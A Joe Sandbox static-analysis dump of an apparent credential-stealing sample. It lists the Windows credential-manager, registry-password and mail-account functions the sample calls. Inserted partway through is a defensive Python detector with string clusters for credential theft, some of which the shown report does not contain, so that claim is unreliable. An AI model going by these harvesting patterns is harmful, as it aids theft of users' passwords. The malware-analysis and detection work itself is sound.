                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                          • API String ID: 1012775001-1343505058
                          • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                          • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                          APIs
                          • memset.MSVCRT ref: 00444612
                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                          • strlen.MSVCRT ref: 0044462E
                          • memset.MSVCRT ref: 00444668
                          • memset.MSVCRT ref: 0044467C
                          • memset.MSVCRT ref: 00444690
                          • memset.MSVCRT ref: 004446B6
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                          • memcpy.MSVCRT ref: 004446ED
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                          • memcpy.MSVCRT ref: 00444729
                          • memcpy.MSVCRT ref: 0044473B
                          • _mbscpy.MSVCRT ref: 00444812
                          • memcpy.MSVCRT ref: 00444843
                          • memcpy.MSVCRT ref: 00444855
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset$strlen$_mbscpy
                          • String ID: salu
                          • API String ID: 3691931180-4177317985
                          • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                          • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                          APIs
                          • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                          • API String ID: 2449869053-232097475
                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                          APIs
                          • sprintf.MSVCRT ref: 0040957B
                          • LoadMenuA.USER32(?,?), ref: 00409589
                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                          • DestroyMenu.USER32(00000000), ref: 004095A7
                          • sprintf.MSVCRT ref: 004095EB
                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                          • memset.MSVCRT ref: 0040961C
                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                          • DestroyWindow.USER32(00000000), ref: 0040965C
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                          • String ID: caption$dialog_%d$menu_%d
                          • API String ID: 3259144588-3822380221
                          • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                          • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                          APIs
                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                          • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                          • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                          • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                          • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                          • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                          • API String ID: 2449869053-4258758744
                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
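Both this function and the psapi.dll one above resolve their imports at run time: LoadLibraryA followed by a run of GetProcAddress calls with literal names (EnumProcesses, GetModuleFileNameExA, ... ; CredReadA, CredEnumerateA, CredEnumerateW, ...), so none of these APIs appear in the import table and the only static trace is the cluster of name strings sitting next to each other. The added example below (not code from the report, Joe Sandbox or the sample) turns that observation into a memory-dump triage check: for each string cluster taken from the report's string tables it looks for the names in both ASCII and UTF-16LE and only reports a hit when most of them occur within a short byte window, which is how a resolver's string table is laid out. The window size, the 75% threshold and the cluster labels are assumptions chosen for the example; the scanned buffer is constructed. A production version of this check would normally be a YARA rule; the Python form is given so it can run against any dump file without further tooling.

```python
from math import ceil
from typing import Dict, List

# String clusters copied from the report's function string tables.
CLUSTERS = {
    "psapi_process_enum": [
        "psapi.dll", "EnumProcesses", "EnumProcessModules",
        "GetModuleBaseNameA", "GetModuleFileNameExA", "GetModuleInformation",
    ],
    "credman_read": [
        "advapi32.dll", "CredReadA", "CredEnumerateA", "CredEnumerateW",
        "CredFree", "CredDeleteA",
    ],
    "firefox_nss": [
        "key4.db", "logins.json", "SELECT a11,a102 FROM nssPrivate",
        "SELECT item1,item2 FROM metadata WHERE id = 'password'",
    ],
    "mail_registry": [
        "POP3 Server", "IMAP Server", "SMTP Server", "HTTPMail Server", "Password2",
    ],
}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset of needle in buf (overlaps included)."""
    out, i = [], buf.find(needle)
    while i != -1:
        out.append(i)
        i = buf.find(needle, i + 1)
    return out


def string_offsets(buf: bytes, s: str) -> List[int]:
    """Offsets of s encoded as ASCII or as UTF-16LE."""
    return sorted(find_all(buf, s.encode("ascii")) + find_all(buf, s.encode("utf-16-le")))


def scan_clusters(buf: bytes, window: int = 4096,
                  min_fraction: float = 0.75) -> Dict[str, Dict[str, int]]:
    """Report each cluster whose members co-occur within `window` bytes.
    A lone string elsewhere in the buffer is not enough for a hit."""
    results: Dict[str, Dict[str, int]] = {}
    for label, strings in CLUSTERS.items():
        hits = sorted((off, s) for s in strings for off in string_offsets(buf, s))
        need = max(2, ceil(len(strings) * min_fraction))
        best_count, best_off = 0, -1
        for i, (off_i, _) in enumerate(hits):
            seen = {s for off, s in hits[i:] if off - off_i <= window}
            if len(seen) > best_count:
                best_count, best_off = len(seen), off_i
        if best_count >= need:
            results[label] = {"offset": best_off, "matched": best_count, "of": len(strings)}
    return results


def constructed_dump() -> bytes:
    """CONSTRUCTED buffer standing in for a process memory dump: an ASCII
    psapi name table, a UTF-16LE credential-API name table, and one stray
    mail-registry string that must not produce a hit on its own."""
    def table(strings: List[str], enc: str = "ascii") -> bytes:
        return b"\x00".join(s.encode(enc) for s in strings) + b"\x00"
    return (b"\x90" * 300
            + table(CLUSTERS["psapi_process_enum"])
            + b"\xcc" * 5000
            + table(CLUSTERS["credman_read"], "utf-16-le")
            + b"\x00" * 100
            + b"Password2\x00"
            + b"\x00" * 2000)


if __name__ == "__main__":
    for label, info in scan_clusters(constructed_dump()).items():
        print(f"{label}: {info['matched']}/{info['of']} names at 0x{info['offset']:x}")
```

The co-location requirement is what keeps the check from firing on a legitimate binary that merely mentions `CredFree` somewhere; the combination of a DLL name and most of its exported function names within one string table is the signature of a deliberate GetProcAddress resolver, and it survives in memory dumps even when the on-disk sample is packed.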
                          APIs
                          • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                          • memset.MSVCRT ref: 0040F84A
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                          • LocalFree.KERNEL32(?), ref: 0040F92C
                          • RegCloseKey.ADVAPI32(?), ref: 0040F937
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                          • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                          • String ID: Creds$ps:password
                          • API String ID: 551151806-1872227768
                          • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                          • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                          • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                          • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                          APIs
                          • wcsstr.MSVCRT ref: 0040426A
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                          • _mbscpy.MSVCRT ref: 004042D5
                          • _mbscpy.MSVCRT ref: 004042E8
                          • strchr.MSVCRT ref: 004042F6
                          • strlen.MSVCRT ref: 0040430A
                          • sprintf.MSVCRT ref: 0040432B
                          • strchr.MSVCRT ref: 0040433C
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                          • String ID: %s@gmail.com$www.google.com
                          • API String ID: 3866421160-4070641962
                          • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                          • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                          APIs
                          • _mbscpy.MSVCRT ref: 00409749
                          • _mbscpy.MSVCRT ref: 00409759
                            • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                            • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                            • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                          • _mbscpy.MSVCRT ref: 004097A1
                          • memset.MSVCRT ref: 004097BD
                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                          • String ID: TranslatorName$TranslatorURL$general$strings
                          • API String ID: 1035899707-3647959541
                          • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                          • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                          • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                          • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                          APIs
                          • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                          • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                          • SelectObject.GDI32(?,?), ref: 0040CACC
                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                          • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                            • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                            • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                            • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                          • LoadCursorA.USER32(00000067), ref: 0040CB2E
                          • SetCursor.USER32(00000000), ref: 0040CB35
                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                          • SetFocus.USER32(?), ref: 0040CB92
                          • SetFocus.USER32(?), ref: 0040CC0B
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                          • String ID:
                          • API String ID: 1416211542-0
                          • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                          • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                          • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                          • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                          • API String ID: 2360744853-2229823034
                          • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                          • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                          APIs
                          • strchr.MSVCRT ref: 004100E4
                          • _mbscpy.MSVCRT ref: 004100F2
                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                          • _mbscpy.MSVCRT ref: 00410142
                          • _mbscat.MSVCRT ref: 0041014D
                          • memset.MSVCRT ref: 00410129
                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                            • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                          • memset.MSVCRT ref: 00410171
                          • memcpy.MSVCRT ref: 0041018C
                          • _mbscat.MSVCRT ref: 00410197
                          Similarity
                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                          • String ID: \systemroot
                          • API String ID: 912701516-1821301763
                          APIs
                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                          • memcpy.MSVCRT ref: 00410961
                          • CoTaskMemFree.OLE32(00000000), ref: 00410970
                          Strings
                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                          Similarity
                          • API ID: FromStringUuid$FreeTaskmemcpy
                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                          • API String ID: 1640410171-2022683286
                          Similarity
                          • API ID: memcpy$strlen
                          • String ID: -journal$-wal$immutable$nolock
                          • API String ID: 2619041689-3408036318
                          Similarity
                          • API ID: ??3@$strlen
                          • String ID:
                          • API String ID: 4288758904-3916222277
                          APIs
                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                          • wcslen.MSVCRT ref: 0040874A
                          • _wcsncoll.MSVCRT ref: 00408794
                          • memset.MSVCRT ref: 0040882A
                          • memcpy.MSVCRT ref: 00408849
                          • wcschr.MSVCRT ref: 0040889F
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                          Similarity
                          • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                          • String ID: J$Microsoft_WinInet
                          • API String ID: 2203907242-260894208
                          APIs
                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                          • _mbscpy.MSVCRT ref: 00409686
                          • _mbscpy.MSVCRT ref: 00409696
                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                          Similarity
                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                          • API String ID: 888011440-2039793938
                          Strings
                          • unable to open database: %s, xrefs: 0042EBD6
                          • database is already attached, xrefs: 0042EA97
                          • out of memory, xrefs: 0042EBEF
                          • database %s is already in use, xrefs: 0042E9CE
                          • cannot ATTACH database within transaction, xrefs: 0042E966
                          • too many attached databases - max %d, xrefs: 0042E951
                          • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          APIs
                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                          • strchr.MSVCRT ref: 0040327B
                          Similarity
                          • API ID: PrivateProfileStringstrchr
                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                          • API String ID: 1348940319-1729847305
                          Similarity
                          • API ID: memcpy
                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                          • API String ID: 3510742995-3273207271
                          APIs
                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                          • memset.MSVCRT ref: 0040FA1E
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                          • _strnicmp.MSVCRT ref: 0040FA4F
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                          Similarity
                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                          • String ID: WindowsLive:name=*$windowslive:name=
                          • API String ID: 945165440-3589380929
                          APIs
                          • memset.MSVCRT ref: 004094C8
                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                          • memset.MSVCRT ref: 0040950C
                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                          • _strcmpi.MSVCRT ref: 00409531
                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                          • String ID: sysdatetimepick32
                          • API String ID: 3411445237-4169760276
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                          • EndDialog.USER32(?,00000002), ref: 00405A96
                          • EndDialog.USER32(?,00000001), ref: 00405AA9
                            • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                            • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                            • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                          Similarity
                          • API ID: Item$DialogMessageSend
                          • String ID:
                          • API String ID: 2485852401-0
                          APIs
                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                          • GetSysColor.USER32(0000000F), ref: 0040B472
                          • DeleteObject.GDI32(?), ref: 0040B4A6
                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                          Similarity
                          • API ID: MessageSend$DeleteImageLoadObject$Color
                          • String ID:
                          • API String ID: 3642520215-0
                          APIs
                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                          • GetDC.USER32(00000000), ref: 004072FB
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                          Similarity
                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                          • String ID:
                          • API String ID: 1999381814-0
                          Similarity
                          • API ID: memcpymemset
                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                          • API String ID: 1297977491-3883738016
                          APIs
                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                          • memcpy.MSVCRT ref: 0044972E
                          • memcpy.MSVCRT ref: 0044977B
                          • memcpy.MSVCRT ref: 004497F6
                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                          • memcpy.MSVCRT ref: 00449846
                          • memcpy.MSVCRT ref: 00449887
                          • memcpy.MSVCRT ref: 004498B8
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          Similarity
                          • API ID: __aulldvrm$__aullrem
                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                          • API String ID: 643879872-978417875
                          Similarity
                          • API ID: memcpymemset$strlen$_memicmp
                          • String ID: user_pref("
                          • API String ID: 765841271-2487180061
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405827
                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                          • memset.MSVCRT ref: 004058C3
                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                          • SetFocus.USER32(?), ref: 00405976
                          Similarity
                          • API ID: MessageSend$FocusItemmemset
                          • String ID:
                          • API String ID: 4281309102-0
                          APIs
                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                            • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                          • _mbscat.MSVCRT ref: 0040A8FF
                          • sprintf.MSVCRT ref: 0040A921
                          Similarity
                          • API ID: FileWrite_mbscatsprintfstrlen
                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                          • API String ID: 1631269929-4153097237
                          APIs
